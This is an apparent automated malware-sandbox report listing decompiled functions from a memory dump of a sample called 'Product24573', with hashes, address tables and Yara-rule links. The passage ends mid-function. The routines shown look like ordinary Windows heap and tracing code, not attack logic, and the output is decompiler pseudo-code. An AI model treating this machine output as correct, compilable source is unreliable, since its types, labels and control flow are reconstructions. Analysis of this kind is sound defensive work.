                                          • Instruction Fuzzy Hash: 4231BD31601B04CFD72ACF2CC840B9AB3E5FF88754F14456DE5A687A94EB35A841CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01176C0A Relevance: .1, Instructions: 79COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 77%
                                          			E01176C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01117D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x11e7b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01114620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0113F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01117D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01139AE0();
						_t23 = L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}












                                          0x01176c0a
                                          0x01176c0f
                                          0x01176c10
                                          0x01176c13
                                          0x01176c15
                                          0x01176c19
                                          0x01176c1c
                                          0x01176c21
                                          0x01176c28
                                          0x01176c3a
                                          0x01176c2a
                                          0x01176c33
                                          0x01176c33
                                          0x01176c3f
                                          0x01176c48
                                          0x01176c4d
                                          0x01176c60
                                          0x01176c65
                                          0x01176c69
                                          0x01176c73
                                          0x01176c79
                                          0x01176c7f
                                          0x01176c86
                                          0x01176c90
                                          0x01176c94
                                          0x01176ca6
                                          0x01176cb2
                                          0x01176cbd
                                          0x01176cbd
                                          0x01176cc3
                                          0x01176cc7
                                          0x01176ccb
                                          0x01176cd0
                                          0x01176cd1
                                          0x01176ce2
                                          0x01176ce2
                                          0x01176c69
                                          0x01176ced

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf31edc41a1d1016b1660d3b3c832cbaed2d5d744f942ab8d4a14c31c7f6753c
                                          • Instruction ID: 22974c0d492411baf608533d4a0a55790560491c93e5686deb513b39f98ff9aa
                                          • Opcode Fuzzy Hash: bf31edc41a1d1016b1660d3b3c832cbaed2d5d744f942ab8d4a14c31c7f6753c
                                          • Instruction Fuzzy Hash: BD21AD71A00A45AFD719DF68D840E6AB7B8FF48704F040069F908C7790D734ED10CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011390AF Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E011390AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0114D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0112E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01114620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0113F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0112A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}


























                                          0x011390af
                                          0x011390b8
                                          0x011390bb
                                          0x011390bf
                                          0x011390c2
                                          0x011390c2
                                          0x011390c8
                                          0x011390cb
                                          0x011390cd
                                          0x011714d7
                                          0x011714eb
                                          0x011714eb
                                          0x00000000
                                          0x011714eb
                                          0x011714db
                                          0x011714e6
                                          0x00000000
                                          0x011714f2
                                          0x011714e8
                                          0x00000000
                                          0x011714e8
                                          0x011390d8
                                          0x011390da
                                          0x011390dd
                                          0x011390e5
                                          0x00000000
                                          0x01139139
                                          0x011390fa
                                          0x011390fe
                                          0x01139142
                                          0x00000000
                                          0x01139142
                                          0x01139104
                                          0x01139107
                                          0x0113910b
                                          0x01139110
                                          0x01139118
                                          0x01139147
                                          0x01139148
                                          0x0113914f
                                          0x01139150
                                          0x01139151
                                          0x01139152
                                          0x01139156
                                          0x0113915d
                                          0x01139160
                                          0x01139168
                                          0x0113916c
                                          0x011391bc
                                          0x011391be
                                          0x00000000
                                          0x011391be
                                          0x0113916e
                                          0x01139173
                                          0x01139176
                                          0x00000000
                                          0x00000000
                                          0x0113917c
                                          0x01139180
                                          0x011391b5
                                          0x00000000
                                          0x011391b5
                                          0x01139182
                                          0x01139185
                                          0x01139189
                                          0x00000000
                                          0x00000000
                                          0x0113918e
                                          0x01139190
                                          0x01139198
                                          0x00000000
                                          0x00000000
                                          0x011391a0
                                          0x00000000
                                          0x011391ad
                                          0x011391ad
                                          0x011391b0
                                          0x011391b1
                                          0x00000000
                                          0x01139185
                                          0x0113911a
                                          0x0113911c
                                          0x0113911f
                                          0x01139125
                                          0x01139127
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction ID: 8b38ea1480c5fa2a15d7dc8e936536d36560bb0a8a77e7a3279c3f7341485863
                                          • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                          • Instruction Fuzzy Hash: 5D218371A00209EFDB25DF59C484E9AFBF8EB94724F15886AE985A7210D370ED40CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01123B7A Relevance: .1, Instructions: 75COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E01123B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x11e84c4; // 0x0
				_v12 = 1;
				_v8 =  *0x11e84c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x11e84c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0113AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0113FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x11e84c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x11e84c4; // 0x0
					L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}












                                          0x01123b89
                                          0x01123b96
                                          0x01123ba1
                                          0x01123bab
                                          0x01123bb5
                                          0x01123bb9
                                          0x01166298
                                          0x01123bbf
                                          0x01123bc2
                                          0x01123bc3
                                          0x01123bc9
                                          0x01123bca
                                          0x01123bcc
                                          0x01123bcd
                                          0x01123bd4
                                          0x01123bd6
                                          0x01123bdb
                                          0x01123bea
                                          0x01123bf7
                                          0x01123bfb
                                          0x01123bff
                                          0x01123c09
                                          0x01123c0a
                                          0x01123c0b
                                          0x01123c0f
                                          0x01123c14
                                          0x01123c18
                                          0x01123c18
                                          0x01123bfb
                                          0x01123c1b
                                          0x01123c30
                                          0x01123c30
                                          0x01123c3d

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2820044b35ae43f75a31f2f380ee068ce47b881f73b51bf28b68248036cff1be
                                          • Instruction ID: 1f6a75cd834489283d48a3667e3e2120bc64fb7610261bf4eec6d644163626e8
                                          • Opcode Fuzzy Hash: 2820044b35ae43f75a31f2f380ee068ce47b881f73b51bf28b68248036cff1be
                                          • Instruction Fuzzy Hash: 3721CF72A00119AFD719DF98CD81F5ABBBDFB44708F150079EA08AB251C371ED51CB90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01176CF0 Relevance: .1, Instructions: 74COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 80%
                                          			E01176CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01117D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01117D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x10d5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0112F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0112F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E01177016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01112400( &_v52);
								}
								_t21 = L01112400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                          0x01176cfb
                                          0x01176d00
                                          0x01176d02
                                          0x01176d06
                                          0x01176d0a
                                          0x01176d0e
                                          0x01176d19
                                          0x01176d2b
                                          0x01176d1b
                                          0x01176d24
                                          0x01176d24
                                          0x01176d33
                                          0x01176d39
                                          0x01176d46
                                          0x01176d4f
                                          0x01176d61
                                          0x01176d51
                                          0x01176d5a
                                          0x01176d5a
                                          0x01176d69
                                          0x01176d6b
                                          0x01176d6d
                                          0x01176d6f
                                          0x01176d6f
                                          0x01176d74
                                          0x01176d79
                                          0x01176d7a
                                          0x01176d7f
                                          0x01176d82
                                          0x01176d88
                                          0x01176d89
                                          0x01176d90
                                          0x01176d94
                                          0x01176da7
                                          0x01176db1
                                          0x01176db1
                                          0x01176dbb
                                          0x01176dbb
                                          0x01176d90
                                          0x01176d69
                                          0x01176d46
                                          0x01176dc6

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 775b2d9864a3e7da6ad5c14e8f15f773632cee47bd0f5ca9296b1729868aeb0a
                                          • Instruction ID: 43ffbd1436f63945f560f86227b9eb122d3fe5dbf1eeca9971117efd71190154
                                          • Opcode Fuzzy Hash: 775b2d9864a3e7da6ad5c14e8f15f773632cee47bd0f5ca9296b1729868aeb0a
                                          • Instruction Fuzzy Hash: FA210032400A469FE729DF28C944BAFBBFCEF91644F040466FA8087390E734C948C6A2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011C070D Relevance: .1, Instructions: 72COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 67%
                                          			E011C070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E011C07DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E011BAFDE( &_v8,  &_v12);
					E011C1293(_t38, _v28, _t60);
					if(E01117D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E011B14FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                          0x011c071b
                                          0x011c0724
                                          0x011c0734
                                          0x011c0738
                                          0x011c074b
                                          0x011c074b
                                          0x011c0753
                                          0x011c0753
                                          0x011c0759
                                          0x011c075d
                                          0x011c0774
                                          0x011c0779
                                          0x011c077d
                                          0x011c0789
                                          0x011c0795
                                          0x011c07a7
                                          0x011c0797
                                          0x011c07a0
                                          0x011c07a0
                                          0x011c07af
                                          0x011c07c4
                                          0x011c07cd
                                          0x011c07cd
                                          0x011c07af
                                          0x011c07dc

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction ID: e3585437a4b1fd6446ce00f0306a4f45d7dc974bbc6f6284f10e70cd98f052ff
                                          • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                          • Instruction Fuzzy Hash: 6521F53A204704AFD709DF58C884AAABBA6EFE4750F04856DF9958B385D730D909CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01177794 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E01177794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x11e7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0113F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01117D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01139AE0();
					_t24 = L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                          0x01177799
                                          0x0117779a
                                          0x0117779b
                                          0x011777a3
                                          0x011777ab
                                          0x011777ae
                                          0x011777b1
                                          0x011777b1
                                          0x011777bf
                                          0x011777c4
                                          0x011777c8
                                          0x011777ce
                                          0x011777d4
                                          0x011777e0
                                          0x011777e0
                                          0x011777d6
                                          0x011777d6
                                          0x011777de
                                          0x00000000
                                          0x00000000
                                          0x011777de
                                          0x011777e5
                                          0x011777f0
                                          0x011777f3
                                          0x011777f6
                                          0x011777fd
                                          0x01177800
                                          0x0117780c
                                          0x01177818
                                          0x0117782b
                                          0x0117781a
                                          0x01177823
                                          0x01177823
                                          0x01177830
                                          0x01177831
                                          0x01177838
                                          0x0117783d
                                          0x0117783e
                                          0x0117784f
                                          0x0117784f
                                          0x0117785a

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 726bfa218b01e0797c5c32f1010a28db964aeac8d7ba07521777885aefdb4cb3
                                          • Instruction ID: e68c938d20496493f50eb15cc2d5b7c8f3c4e926aeaf9b6ed0288825bea25da1
                                          • Opcode Fuzzy Hash: 726bfa218b01e0797c5c32f1010a28db964aeac8d7ba07521777885aefdb4cb3
                                          • Instruction Fuzzy Hash: F8218172900604ABC729DF69D894E6BBBB9EF48740F14456DF60AD7790D734E900CB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111AE73 Relevance: .1, Instructions: 70COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 96%
                                          			E0111AE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E01117D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E01117D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E01117D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E01117D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E01177794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                          0x0111ae78
                                          0x0111ae7c
                                          0x0111ae7e
                                          0x0111ae81
                                          0x0111ae86
                                          0x0111ae8d
                                          0x01162691
                                          0x0111ae93
                                          0x0111ae93
                                          0x0111ae93
                                          0x0111ae98
                                          0x0111ae9d
                                          0x011626a2
                                          0x011626b4
                                          0x011626a4
                                          0x011626ad
                                          0x011626ad
                                          0x011626b9
                                          0x00000000
                                          0x011626bb
                                          0x00000000
                                          0x011626bb
                                          0x0111aea3
                                          0x0111aea3
                                          0x0111aea3
                                          0x0111aeaa
                                          0x011626c0
                                          0x011626c9
                                          0x011626c9
                                          0x0111aeb3
                                          0x011626d4
                                          0x011626e1
                                          0x00000000
                                          0x00000000
                                          0x011626e7
                                          0x011626ee
                                          0x011626f0
                                          0x011626f9
                                          0x011626f9
                                          0x01162702
                                          0x01162708
                                          0x01162708
                                          0x0116270b
                                          0x0116270f
                                          0x01162711
                                          0x01162711
                                          0x01162725
                                          0x01162725
                                          0x00000000
                                          0x0111aeb9
                                          0x0111aeb9
                                          0x0111aebf
                                          0x0111aebf
                                          0x0111aeb3

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction ID: adb21f273bb6d81ba5894d89cfc2e7dcc0704543dbfe1a70f09cfb156bbeaef2
                                          • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                          • Instruction Fuzzy Hash: C521F6726026859FEB1E9B2CC944B25BBE9EF44354F1A00B0DD048B7A6E779DC50C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112FD9B Relevance: .1, Instructions: 69COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E0112FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L011177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E011076E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L01114620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                          0x0112fd9b
                                          0x0112fda0
                                          0x0112fda1
                                          0x0112fdab
                                          0x0112fdad
                                          0x0112fdb0
                                          0x0112fdb8
                                          0x0112fe0f
                                          0x0112fde6
                                          0x0112fde9
                                          0x0112fdec
                                          0x0116c0c0
                                          0x0112fdfe
                                          0x0112fe06
                                          0x0112fe06
                                          0x0116c0c8
                                          0x0112fe2d
                                          0x0112fe2d
                                          0x00000000
                                          0x0112fe2d
                                          0x0116c0d1
                                          0x0116c0e0
                                          0x0116c0e5
                                          0x0116c0e5
                                          0x0116c0e8
                                          0x00000000
                                          0x0116c0e8
                                          0x0112fdf4
                                          0x00000000
                                          0x00000000
                                          0x0112fdf6
                                          0x0112fdfa
                                          0x0112fe1a
                                          0x0112fe1f
                                          0x0112fe1f
                                          0x0112fdfc
                                          0x00000000
                                          0x0112fdfc
                                          0x0112fdcc
                                          0x0112fdd0
                                          0x0112fe26
                                          0x00000000
                                          0x0112fe26
                                          0x0112fdd8
                                          0x0112fddb
                                          0x0112fddd
                                          0x0112fde0
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction ID: f21903a83bd11a760b4d2c85bbd5b82d07775accf4049542c60a8e1852e1ca2e
                                          • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                          • Instruction Fuzzy Hash: 1E219A76600A66DFD73ACF09C540A6AF7F5EB94A10F22857EE94987611D731AC12CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0112B390 Relevance: .1, Instructions: 63COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0112B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E01112280(_t12, 0x11e8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
